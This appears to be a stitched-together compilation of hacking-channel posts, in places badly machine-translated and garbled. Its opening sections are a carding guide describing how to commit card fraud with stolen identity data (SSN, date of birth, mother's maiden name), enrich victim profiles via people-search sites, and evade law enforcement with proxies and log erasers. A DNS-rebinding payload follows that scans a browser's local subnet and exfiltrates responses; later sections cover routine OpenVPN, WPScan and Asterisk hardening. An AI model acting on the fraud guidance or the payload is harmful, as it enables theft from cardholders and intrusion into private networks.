โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCarding 2020
FRAUD WITH SS. KEY INFORMATION
Instagram.com/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) I want to clarify right now. The secret in carding is not the number of cards that you own, but what you can do with these cards. What I mean? Everything is very simple.
2) Hypothetical situation: My name is Johnny and I have 3 SSs with SSN, DOB, CVV NUMBER, MMN, NAME, STREET ADDRESS, CITY, ZIP, AND BILLING TELEPHONE NUMBER. And also
3) I have a friend whose name is Billy with 300mi SS with CVV, MMN, NAME, STREET ADDRESS, CITY, ZIP, AND BILLING TEL. NUMBER Who is more likely to get something?
4) Simply put, I (Johnny). Why? Because I have more information that can prove that I am the person who owns these SSs than the one that three hundred Billy cards have.
5) Does this mean that Billy will not get a damn thing from his cards? No, it just means that Billy will have a hard time carding with checks.
6) Thus, to summarize this example, you should have as much information as possible on the card holder. The first rule of carding: the more information you have on the victim, the more
you have a chance of success. Here is the information you need to know (note: "card level" is not a technical term in carding, you just use L1, L2, L3 to
NAME:
ADDRESS:
CITY:
STATE:
ZIP CODE:
Tel. BILLING NUMBER:
CARD NUMBER:
CARD EXP DATE:
CVV CODE:
๐ฆ Ordinary CVV. If you have this information, then you are the owner of an ordinary SS. Currently, it is worth noting that this is a necessary minimum of information to work in
Social Security Number (SSN):
Date Of Birth (DOB):
Mothers Maide Name (MMN):
๐ฆ Partial Fulka. If you have this information, then you have a higher-level SS. With this information you should be able to card PayPal, c2it and some
BANK ACCOUNT NUMBER:
ROUTING NUMBER:
BANK NAME:
BANK NUMBER:
DRIVERS LICENSE NUMBER:
PIN NUMBER (For CC or ATM card)
๐ฆ next . If you have all this information, then with your SS you can junk everything your heart desires)
> Now, if all you have is ordinary SS, don't be upset. Just do some work (search) to increase the level of your map:
1) First of all, go to whitepages.com and try to find out the address and phone number of the cardholder. Make sure that all this really belongs to the cardholder.
2) Further. There is an excellent service called "Phantominfo" ( http://www.phantominfo.com, its owner lives on the SC forum), which will help you find information for your SSs such as SSN and
3) DOB for only $ 29 / month. Of course, many carders have PI accounts, so you can always ask for help.
4) And last but not least, a quick look at ancestry.com. Ancestry.com, this is a piece of whore, but you can find DOB and MMN (i.e. if your cardholder is called xy)
5) his father David x and his mother's name is Bella y, and Donna is MMN)
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆIMPROVEMENT OF ANONYMITy For Carding
instagram.com/UndercodeTestingCompany
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) Security is a key factor. Nobody needs the federals to rediscover all of us here, therefore we should be as anonymous as possible.
2) First of all, I must say that there is no 100% anonymity in carding. Do not let people fool you with promises of complete anonymity. You can use everything: proxy,
3) Wingates, Sox and hell knows what else, but you will always set aside โdigital fingerprintsโ wherever you are. For my personal purposes, I use a bore ISP in combination with
4) an anonymizer account ( http://anonymizer.com ) and a first level proxy. But I do not recommend repeating this to everyone.
> http://anonymizer.com offers excellent services for those who want to remain anonymous. The trouble is that this is a service, and like in another service you will have to pay for it, plus in case
5) what they can hand you over. If you plan to use anonymizer, you just need to focus on keeping your IP secret from the anonymizer, and not from the site on which you
cardite.
6) Proxies and stuff: I use private hidden proxies, and I really donโt fuck with the rest of the proxies, so I can say not so much on this topic (maybe someone can
7) get free proxies at http://anonymitycheker.com/page1.htm, they also test proxies and other crap in real time there.
8) Stealther: These programs will help connect your proxies for maximum anonymity. Stealthers are registered using the key (so you will need to go to "UndercodeTesting
9) EvidenceEliminator: If you really seriously decided to do carding, then this program MUST be on your hard drive ANYWHERE! The feds have some
10) programs that help them extract interesting information for them, for example, the pages you visited, the files you deleted, and the emails you wrote. Each time when your computer restarts, E.E. It works by providing you security by erasing all logs and file history. You have to prepare for the best.
11) JAVA: Enemy Carder. It should always be disabled in your browser.
12) CARDED ISP: Honestly, I'm not sure if carding in ISP is safe. I have heard many different reviews about this idea. However, I can testify that I had experience
13) there was still no problem working with this case. Some popular ISPs are charged with Earthlink Pre-paid (you can pay for this service for a year, see the link on their websites) and America Online.
14) These are not the only options to ensure anonymity, only the most popular. If it seems to you that you have come across a working way to secure anonymity for yourself -
> use it anyway. You will never know what works and what doesn't until you try.
15) If you want to find out how well you have protected yourself, take the following tests:
> http://www.whatismyip.com: this is the first and main test. whatismyip.com is an easy way to find out which IP you are currently online on. JAVA doesnโt work here, so you canโt after
16) Successful passage consider yourself safe.
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆDNS Rebinding Exploitation Framework 2019 updated :
t.me/UndercOdeTesting
dref does the heavy-lifting for DNS rebinding. The following snippet from one of its built-in payloads shows the framework being used to scan a local subnet from a hooked browser; after identifying live web services it proceeds to exfiltrate GET responses, breezing through the Same-Origin policy:
// mainFrame() runs first
async function mainFrame () {
  // We use some tricks to derive the browser's local /24 subnet
  const localSubnet = await network.getLocalSubnet(24)

  // We use some more tricks to scan a couple of ports across the subnet
  netmap.tcpScan(localSubnet, [80, 8080]).then(results => {
    // We launch the rebind attack on live targets
    for (let h of results.hosts) {
      for (let p of h.ports) {
        if (p.open) session.createRebindFrame(h.host, p.port)
      }
    }
  })
}

// rebindFrame() will have target ip:port as origin
function rebindFrame () {
  // After this we'll have bypassed the Same-Origin policy
  session.triggerRebind().then(() => {
    // We can now read the response across origin...
    network.get(session.baseURL, {
      successCb: (code, headers, body) => {
        // ... and exfiltrate it
        session.log({code: code, headers: headers, body: body})
      }
    })
  })
}
@UNDERCODEOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow To Secure Traffic Between VPS Using OpenVPN ?
t.me/UndercOdeTesting
🦑 LET'S START:
> You'll need at least two droplets or VPS for this OpenVPN setup, and will work up to around 60 VPS without major modifications. So to get started, create two droplets. For the rest of this tutorial, I'll refer to them as Droplet 1 and Droplet 2.
๐ฆ On Droplet 1
1) Create the droplet with Ubuntu 13.04 x32.
> This should work without modification on any version of Ubuntu that DigitalOcean offers, but was only tested on 13.04.
2) Connect to the VPS via secure shell. We're going to update packages and install a few things.
3) aptitude update
4) aptitude dist-upgrade -y
5) aptitude install openvpn firehol -y && reboot
6) If your shell goes purple during this, just choose "Install Package Maintainer's Version" twice.
๐ฆ Meanwhile, on Droplet 2
1) Create the droplet with Ubuntu 13.04 x32.
2) Again, this should work on any version of Ubuntu.
> Connect to the VPS via secure shell. We're going to update packages and install a few things.
3) aptitude update
4) aptitude dist-upgrade -y
5) aptitude install openvpn -y && reboot
6) Again, if your shell goes purple during this, just choose "Install Package Maintainer's Version" twice.
๐ฆ Now Generating the Keys:
> The key generation is going to be done exclusively on Droplet 1. Type the following commands into the shell:
1) cd /etc/openvpn/
2) mkdir easy-rsa
3) cd easy-rsa
4) cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0/* .
5) Next, we're going to type in some presets which will vastly speed up the key generation process. Type the following command:
6) nano /etc/openvpn/easy-rsa/vars
7) Go ahead and edit the following values (you only need to do these, although there are several more present):
KEY_COUNTRY
KEY_PROVINCE
KEY_CITY
KEY_ORG and
KEY_EMAIL
8) You may adjust the KEY_SIZE to 2048 or higher for added protection.
9) Save and exit with Control-O, Enter, and Control-X.
Posted BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCreate the Certificate Authority Certificate and Key (vps tutorial)
twitter.com/UndercodeTC
🦑 LET'S START:
1) Type the following commands:
source vars
./clean-all
./build-ca
2) You should be able to hit Enter through all of the questions.
Note: if you ever have to go back and create more keys, you'll need to retype source vars but don't type ./clean-all or you'll erase your Certificate Authority, undermining your whole VPN setup.
3) Create Server Certificate and Key
> Generate the server certificate and key with the following command:
4) ./build-key-server server
5) You should be able to hit Enter on defaults, but make sure the Common Name of the certificate is "server".
6) It will ask you to add a pass phrase, but just hit Enter without typing one.
7) When it asks you "Sign the certificate?", type y and hit Enter.
8) When it says "1 out of 1 certificate requests certified, commit?", type y and hit Enter
๐ฆTested by UndercOde
Posted BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow To Generate Client Keys (vps tutorial3)
> Next is generating the certificate and keys for the clients. For security purposes, each client will get its own certificate and key.
fb.com/UndercOdeTestingCompany
๐ฆExample :
1) I'm naming the first client "client1", so if you change this, you'll have to adjust it several times later. So type in the following:
> ./build-key client1
2) As with the server key, when it asks you "Sign the certificate?", type y and hit Enter.
3) When it says "1 out of 1 certificate requests certified, commit?", type y and hit Enter.
4) Go ahead and repeat this for as many clients as you need to make. You can also come back to this later (though remember to run "source vars" again if you do so).
5) Generate Diffie-Hellman Parameters
This is used after authentication, to determine the encryption parameters. Simply type the following line:
> ./build-dh
6) Copy Keys into Place
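7) Next, we copy the various keys and certificates into place on the cloud server (the Diffie-Hellman file is named after KEY_SIZE, so if you raised it to 2048 the file is dh2048.pem rather than dh1024.pem):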
> cd /etc/openvpn/easy-rsa/keys
> cp ca.crt dh1024.pem server.crt server.key /etc/openvpn
8) It's very important that keys are kept secure. Double check that only root has permission to read. So type:
> ls -lah /etc/openvpn
9) What you're looking for is that server.key has -rw------- for permissions (read/write for owner, none for group, and none for everyone else). If you need to change it, use this command:
> chmod 600 /etc/openvpn/server.key
Posted BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
🦑 Now let's generate an SSH key to secure the server:
> Example: we have two clients:
T.me/UndercOdeTesting
🦑 LET'S START:
1) On Droplet 1
Generate SSH keys with the following command:
> ssh-keygen -t rsa
2) It will choose a default filename and then ask you for a secure passphrase, which you should set. Find the SSH public key you just generated and type:
> cat ~/.ssh/id_rsa.pub
3) Copy the results onto the clipboard. It's a few lines of letters and numbers looking like:
> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo249TgbI1gYP42RbLcDhsNN28r/fNT6ljdFOZxhk+05UAPhxq8bASaqSXZI3K8EEI3wSpigaceNUu65pxLEsZWS8xTtjY4AVxZU2w8GIlnFDSQYr3M2A77ZAq5DqyhGmnnB3cPsIJi5Q6JQNaQ/Meg1v7mYR9prfEENJeXrDiXjxUqi41NlVdb5ZQnPL1EdKM+KN/EPjiTD5XY1q4ICmLJUB8RkffHwH2knEcBoSZW2cNADpMu/IqtxTZpFL0I1eIEtoCWg4mGIdIo8Dj/nzjheFjavDhiqvUEImt1vWFPxHEXt79Iap/VQp/yc80fhr2UqXmxOa0XS7oSGGfFuXz root@openvpn1
4) But USE YOUR OWN, not mine. Your id_rsa.pub doesn't need to be kept secure, but if you use the key above, that would allow me access to your VPS.
5) Meanwhile, on Droplet 2
cd ~/.ssh
(If you get an error, create the folder with mkdir ~/.ssh).
nano authorized_keys
6) Paste the public key that is in your clipboard onto a new line, then save and exit with Control-O, Enter, Control-X.
7) Back to Droplet 1
Next, we copy the appropriate keys onto the second server:
scp /etc/openvpn/easy-rsa/keys/ca.crt \
/etc/openvpn/easy-rsa/keys/client1.crt \
/etc/openvpn/easy-rsa/keys/client1.key \
root@droplet2ip:~/
8) It will ask you "Are you sure you want to continue connecting (yes/no)?", so type yes and hit Enter.
> Then input the passphrase you've just created.
๐ฆ Switching again to Droplet 2 :
1) Next, we move the certificates and keys into their final location:
cd ~
mv ca.crt client1.crt client1.key /etc/openvpn
ls -l /etc/openvpn
2) As the key must be kept secure, let's make sure client1.key has the correct permissions (-rw-------).
3) Again, if need be, the permissions can be reset with the following command:
> chmod 600 /etc/openvpn/client1.key
@UNDERCODEOfficial
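A check for the two permission steps above (server.key on Droplet 1, client1.key on Droplet 2), added here as an example and not part of the original tutorial. The function names audit_keys and key_mode_and_uid are made up for this example, the demo directory is constructed, and -r-------- is accepted as well as the -rw------- the tutorial asks for.

```shell
#!/bin/sh
# Added example: audit every private key (*.key) in an OpenVPN directory.
# Real use, as root:  audit_keys /etc/openvpn        (report only)
#                     audit_keys /etc/openvpn 0 fix  (chmod 600 where needed)

# key_mode_and_uid FILE -> prints "<10-char mode string> <numeric uid>"
key_mode_and_uid() {
    # ls -ldn is POSIX; substr() drops a trailing ACL/SELinux marker ("+" or ".")
    ls -ldn "$1" | awk '{ print substr($1, 1, 10), $3 }'
}

# audit_keys DIR [EXPECTED_UID] [fix]
# Returns 0 if every key is owner-only, 1 if any key is not, 2 on usage errors.
audit_keys() {
    audit_dir=$1
    audit_uid=${2:-0}          # the tutorial expects root (uid 0) to own the keys
    audit_fix=${3:-}
    audit_bad=0
    audit_seen=0

    if [ ! -d "$audit_dir" ]; then
        echo "ERROR: $audit_dir is not a directory" >&2
        return 2
    fi

    for key in "$audit_dir"/*.key; do
        [ -e "$key" ] || [ -L "$key" ] || continue   # glob matched nothing
        audit_seen=$((audit_seen + 1))

        # A symlink's own mode says nothing about the key it points to.
        if [ -L "$key" ]; then
            echo "BAD   $key: symlink, audit the target instead"
            audit_bad=$((audit_bad + 1))
            continue
        fi

        info=$(key_mode_and_uid "$key")
        mode=${info% *}
        uid=${info#* }

        # Wrong owner is reported but never changed automatically.
        if [ "$uid" != "$audit_uid" ]; then
            echo "BAD   $key: owned by uid $uid, expected $audit_uid"
            audit_bad=$((audit_bad + 1))
            continue
        fi

        case $mode in
            -rw-------|-r--------)
                echo "OK    $key"
                ;;
            *)
                if [ "$audit_fix" = "fix" ] && chmod 600 "$key"; then
                    echo "FIXED $key: was $mode"
                else
                    echo "BAD   $key: mode $mode, expected -rw-------"
                    audit_bad=$((audit_bad + 1))
                fi
                ;;
        esac
    done

    if [ "$audit_seen" -eq 0 ]; then
        echo "ERROR: no *.key files in $audit_dir" >&2
        return 2
    fi
    [ "$audit_bad" -eq 0 ]
}

# Constructed demo: builds a throw-away directory instead of touching /etc/openvpn.
demo() {
    d=$(mktemp -d) || return 1
    : > "$d/server.key"  && chmod 600 "$d/server.key"
    : > "$d/client1.key" && chmod 644 "$d/client1.key"   # deliberately too open
    audit_keys "$d" "$(id -u)"
    status=$?
    rm -rf "$d"
    return "$status"
}

if [ "${1:-}" = "demo" ]; then demo; fi
```

Run the script with the argument `demo` to see one OK line and one BAD line; a non-zero exit status makes it usable from cron or a deployment check.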
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ How to install and run WPScan on Windows
> WPScan is a vulnerability scanner for WordPress powered sites. It works on the principle of a "black box", that is, without access to the source code. It can be used to crawl remote WordPress sites for security issues.
t.me/UndercOdeTesting
๐ฆThe vulnerability search process is as follows:
1) Installed plugins and themes are searched for on the specified site.
2) Since plugins are placed in the same folders on all sites, you can determine the availability of the plugin by making a request to a specific file. Attempts are also being made to determine the versions for plugins and detected themes.
3) If the plugin is found, then the database checks if there are vulnerabilities for it.
4) Additionally, the version of WordPress is determined and known vulnerabilities are displayed.
5) Backup files and databases are also searched, the robots.txt file is analyzed, a list of users and other information useful to the site security auditor are displayed.
🦑 INSTALLATION & RUN:
1) WPScan is usually used on Linux, this program is already preinstalled on distributions such as Kali Linux and BlackArch. WPScan is written in Ruby and can be run on any operating system that supports Ruby, including Windows. When using WPScan in Windows, there are some nuances that will be discussed later.
2) To install WPScan on Windows, you need to start by installing Ruby , as described in this article .
3) Then do a WPScan search among the gem packages:
> gem search WPScan
> gem install wpscan
4) Now you need to update the WPScan database with information about plugins and WordPress themes:
> wpscan --update --disable-tls-checks
5) If the error "Could not open library 'libcurl.dll', 'libcurl.so.4', 'libcurl.so.dll'" occurs during startup, then continue:
if works stop (depend on win version)
6) To run WordPress site crawls on Windows using WPScan, run a command of the form:
> wpscan --url https://sitename.com --random-user-agent --disable-tls-checks
Written BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWhy WPScan does not show vulnerabilities. How to get WPVulnDB API
WPScan used to output the versions of the plugins and themes it found and, if a plugin or theme had vulnerabilities, to output those as well. Now WPScan only shows the versions of WordPress, plugins and themes, but does not display vulnerabilities. Instead, the following messages are shown at the end of the scan:
instagram.com/UndercodeTestingCompany
🦑 LET'S START:
1) No WPVulnDB API Token given, as a result vulnerability data has not been output.
2) You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.
3) They say that the WPVulnDB API is not defined, so there is no information about vulnerabilities in the output. You can get a free API that gives you the right to make 50 requests per day. To do this, just
> register at https://wpvulndb.com/users/sign_up .
4) There is no catch โ just go ahead, register and get your free token.
5) Then add the --api-token option to the command to run :
> wpscan --url https://URLexanple --random-user-agent --disable-tls-checks --api-token API_
🦑ITWSV - Integrated Tool for Web Security Vulnerability, Linux tool: updated 2019
🦑INSTALLATION & RUN:
1) git clone https://github.com/penetrate2hack/ITWSV.git
2) cd ITWSV
3) chmod +x start.sh
4) chmod +x update.sh (only if required)
5) ./start.sh
🦑Features:
WHOIS
DNSWALK
FIERCE
DNSRecon
DNSenum
NMAP
DMitry
theHarvester
LBD
SSLScan
SSLYze
WhatWeb
Automater
Grabber
Parsero
Uniscan
Metagoofil
A2SV
WPScan
Droopescan
WPSeku
XssPy
Spaghetti
sublist3r
WAFW00F
nslookup
dirsearch
OWASP Joomscan
Gobuster
OTHER TOOLS
Pureblood
Wapiti
Lscript
Trity
🦑To know Python you must know these topics:
🦑 LET'S START:
1) In-Place Swapping Of Two Numbers.
2) Reversing a string in Python.
3) Create a single string from all the elements in list.
4) Chaining Of Comparison Operators.
5) Print The File Path Of Imported Modules.
6) Use Of Enums In Python.
7) Return Multiple Values From Functions.
8) Find The Most Frequent Value In A List.
🦑What is unauthorized access?
🦑 LET'S START:
1) Unauthorized access is when someone gains access to a website, program, server, service, or other system using someone else's account or other methods. For example, if someone kept guessing a password or username for an account that was not theirs until they gained access, it is considered unauthorized access.
2) Unauthorized access could also occur if a user attempts to access an area of a system they should not be accessing. When attempting to access that area, they would be denied access and possibly see an unauthorized access message.
3) Some system administrators set up alerts to let them know when there is an unauthorized access attempt, so that they may investigate the reason. These alerts can help stop hackers from gaining access to a secure or confidential system. Many secure systems may also lock an account that has had too many failed login attempts.
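The alerting and lockout behaviour described in point 3, as an added example that is not part of the original post: a small monitor that counts failed logins per account in a sliding window, locks the account and raises alerts. The log format, the thresholds and the names `SAMPLE_EVENTS` and `monitor_logins` are assumptions made for the illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events (timestamp, account, source IP, result); not real logs.
SAMPLE_EVENTS = """\
2020-01-10T09:00:01 alice 203.0.113.7 FAIL
2020-01-10T09:00:05 alice 203.0.113.7 FAIL
2020-01-10T09:00:09 bob 198.51.100.4 FAIL
2020-01-10T09:00:12 alice 203.0.113.7 FAIL
2020-01-10T09:00:20 bob 198.51.100.4 OK
2020-01-10T09:00:31 alice 203.0.113.7 FAIL
2020-01-10T09:00:40 alice 203.0.113.7 OK
2020-01-10T09:30:00 bob 198.51.100.4 FAIL
"""

def monitor_logins(log_text, max_failures=3, window=timedelta(minutes=5),
                   lock_for=timedelta(minutes=15)):
    """Return (alerts, locked_until) for a chronological login log."""
    failures = defaultdict(deque)      # account -> times of recent failures
    locked_until, alerts = {}, []
    for line in log_text.splitlines():
        stamp, account, source, result = line.split()
        now = datetime.fromisoformat(stamp)
        if locked_until.get(account, now) > now:
            # A locked account rejects every attempt, even a correct password.
            alerts.append(f"{stamp} {account}: attempt from {source} while locked")
            continue
        if result == "OK":
            failures[account].clear()  # a successful login resets the counter
            continue
        recent = failures[account]
        recent.append(now)
        while recent and now - recent[0] > window:
            recent.popleft()           # forget failures outside the window
        if len(recent) >= max_failures:
            locked_until[account] = now + lock_for
            alerts.append(f"{stamp} {account}: {len(recent)} failed logins, locked")
            recent.clear()
    return alerts, locked_until
```
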
🦑 Preventing unauthorized access:
🦑 LET'S START:
You may be alerted to a security incident in the media, such as the discovery of the Heartbleed bug, or your computer could be stolen while you're signed in to GitHub. In such cases, changing your password prevents any unintended future access to your account and projects.
1) GitHub requires a password to perform sensitive actions, such as adding new SSH keys, authorizing applications, or modifying team members.
2) After changing your password, you should perform these actions to make sure that your account is secure:
3) Enable two-factor authentication on your account so that access requires more than just a password.
4) Review your SSH keys, deploy keys, and authorized integrations and revoke unauthorized or unfamiliar access in your SSH and Applications settings.
5) Verify all your email addresses. If an attacker added their email address to your account, it could allow them to force an unintended password reset.
6) Review your account's security log. This provides an overview on various configurations made to your repositories. For example, you can ensure that no private repositories were turned public, or that no repositories were transferred.
7) Review the service hooks on your repositories. Service hooks could allow an attacker to intercept pushes made to your repository.
8) Make sure that no new deploy keys were created. This could enable outside servers access to your projects.
9) Review recent commits made to your repositories.
10) Review the list of collaborators for each repository.
🦑The task is to install pypi on Windows:
🦑INSTALLATION & RUN:
1) I had Python 2.7 installed
2) Take pypi from this link:
> https://pypi.org/project/jaraco.windows/
3) Unpack into c:\pypi, for example
4) Next, open cmd:
> cd c:\pypi
> C:\Python27\python.exe setup.py install
5) Open a new cmd:
6) Let's check:
> pip install exampletool
🦑Asterisk and security:
🦑 LET'S START:
1) Use a custom port instead of 5060
2) The port is configured in the sip.conf file, in the [general] section: bindport = 5060 => bindport = 5071
3) Disable guest calls
4) If you do not need to receive calls without registration, turn off the following option in sip.conf:
allowguest = yes => allowguest = no
5) Turn off the wrong-password notification
6) Change this option in sip.conf:
alwaysauthreject = no => alwaysauthreject = yes
7) Use complex passwords for accounts
8) Remove all passwords that match the login:
secret=Vad34@QW545!
9) Use deny / permit for accounts
10) For all accounts that are not meant to connect from the Internet, add the following lines:
[100]
...
deny=0.0.0.0/0.0.0.0
permit=10.1.1.1/24
permit=10.1.2.1/24
Set the call limit:
[100]
call-limit=1
11) Do not use the default extension. All that should be in default:
[default]
exten => _X.,1,Hangup
12) Do not make one universal rule for all calls:
exten => _X.,1,Dial(SIP/${EXTEN}@operator)
13) Write out explicitly all the necessary number combinations that are passed to the operator:
; Emergency services
exten => _0X,1,Dial(SIP/${EXTEN}@operator)
exten => _0X,n,Hangup
; Melbourne
exten => _.,..XXXXX,1,Dial(SIP/${EXTEN}@operator)
exten => _..XXXXX,n,Hangup
exten => _...XXXXXX,1,Dial(SIP/${EXTEN}@operator)
exten => _...XXXXX,n,Hangup
exten => _XXXXXXX,1,Dial(SIP/${EXTEN}@operator)
exten => _..XXXXX,n,Hangup
; Intercity Australia / Mobile
exten => 61...
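One way to check a sip.conf against the settings listed above, as an added example that is not part of the original post or of Asterisk itself: a small auditor that parses the file and reports each weak setting. The sample configuration is constructed, the names `parse_sip_conf` and `audit_sip_conf` are hypothetical, and a missing [general] key is assumed to have the insecure value the post starts from (real defaults vary by Asterisk version).

```python
import re

# Constructed sample sip.conf (not from the post); peer 101 is weak on purpose.
SAMPLE_SIP_CONF = """
[general]
bindport = 5060        ; default SIP port
allowguest = yes
alwaysauthreject = yes
[100]
secret = Vad34@QW545!
deny = 0.0.0.0/0.0.0.0
permit = 10.1.1.1/24
call-limit = 1
[101]
secret = 101
"""

def parse_sip_conf(text):
    """Return {section: {key: [values]}}; keys such as permit may repeat."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()          # drop ; comments
        header = re.match(r"\[([^\]]+)\]", line)
        if header:
            current = sections.setdefault(header.group(1), {})
        elif current is not None and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            current.setdefault(key.lower(), []).append(value)
    return sections

def audit_sip_conf(text):
    """Check the settings listed in the post and return a list of findings."""
    conf = parse_sip_conf(text)
    general = conf.get("general", {})
    # Assumption: a missing key counts as the insecure value the post starts from.
    last = lambda sec, key, default: sec.get(key, [default])[-1].lower()
    insecure = {"bindport": "5060", "allowguest": "yes", "alwaysauthreject": "no"}
    findings = [f"general: {key} = {bad}" for key, bad in insecure.items()
                if last(general, key, bad) == bad]
    for name, peer in conf.items():
        if name == "general":
            continue
        if last(peer, "secret", "") in ("", name.lower()):
            findings.append(f"{name}: secret is empty or equals the login")
        if "0.0.0.0/0.0.0.0" not in peer.get("deny", []) or "permit" not in peer:
            findings.append(f"{name}: no deny/permit restriction")
        if "call-limit" not in peer:
            findings.append(f"{name}: no call-limit")
    return findings
```
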